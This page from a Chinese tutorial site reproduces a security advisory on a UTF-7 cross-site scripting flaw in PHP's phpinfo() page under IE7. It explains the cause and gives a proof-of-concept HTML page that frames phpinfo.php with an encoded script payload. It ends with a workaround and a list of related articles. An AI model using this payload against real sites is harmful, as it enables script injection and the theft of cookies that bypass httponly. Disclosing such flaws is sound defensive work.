手机
当前位置:查字典教程网 >网络安全 >漏洞分析 >phpinfo跨站脚本漏洞
phpinfo跨站脚本漏洞
摘要:漏洞说明:php是一款被广泛使用的编程语言,可以被嵌套在html里用做web程序开发。phpinfo()是用来显示当前php环境的一个函数,...

漏洞说明:

php是一款被广泛使用的编程语言,可以被嵌套在html里用做web程序开发。phpinfo()是用来显示当前php环境的一个函数,许多站点和程序都会将phpinfo放在自己的站点上或者在程序里显示,但是phpinfo里存在一些安全问题,导致精心构造数据就可以产生一个跨站脚本漏洞,可以被用来进行攻击。

漏洞成因: phpinfo页面对输入的参数都做了详细的过滤,但是没有对输出的进行charset的指定,而在一些浏览器里如IE7里,你可以让它自动选择编码或者通过一个iframe页面给它指定编码,这样就可以饶过phpinfo的过滤而产生一个跨站脚本漏洞。

漏洞来源: http://www.80sec.com/release/phpinfo-xss.txt

漏洞利用: 利用代码如下:

<html>

<head>

<META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7">

</head>

<body>

<iframe src="http://www.80sec.com/phpinfo.php? ADw-SCRIPT AD4-alert(document.domain); ADw-/SCRIPT AD4-=1">

以上代码在IE7 php 5.2.6测试成功。phpinfo页面的xss甚至比其他页面更加危险,因为如果有phpinfo的存在,恶意攻击者可以利用phpinfo的输出bypass如httponly和一些基础认证。

漏洞影响: 影响所有版本的php和浏览器IE7

漏洞修补: 建议暂时删除站点的phpinfo页面避免被人利用。

【phpinfo跨站脚本漏洞】相关文章:

多个D-Link 产品含跨站脚本攻击以及拒绝服务漏洞

发掘MaosinCMS网站系统漏洞与测试

网站受到XSS跨站点脚本攻击的分析及解决方法

OpenBSD rtlabel_id2name()本地拒绝执行服务漏洞

Apple iPhoto 存在订阅远程格式串处理漏洞

Apple iPhone Passcode Lock 绕过安全限制的漏洞

IE 存在document.open()方式地址欺骗漏洞

NetWin SMSGate Content-Length远程拒绝服务漏洞

Coppermine Photo Gallery跨站脚本及SQL注入漏洞

Lighttpd mod_cgi模块信息泄露漏洞

精品推荐
分类导航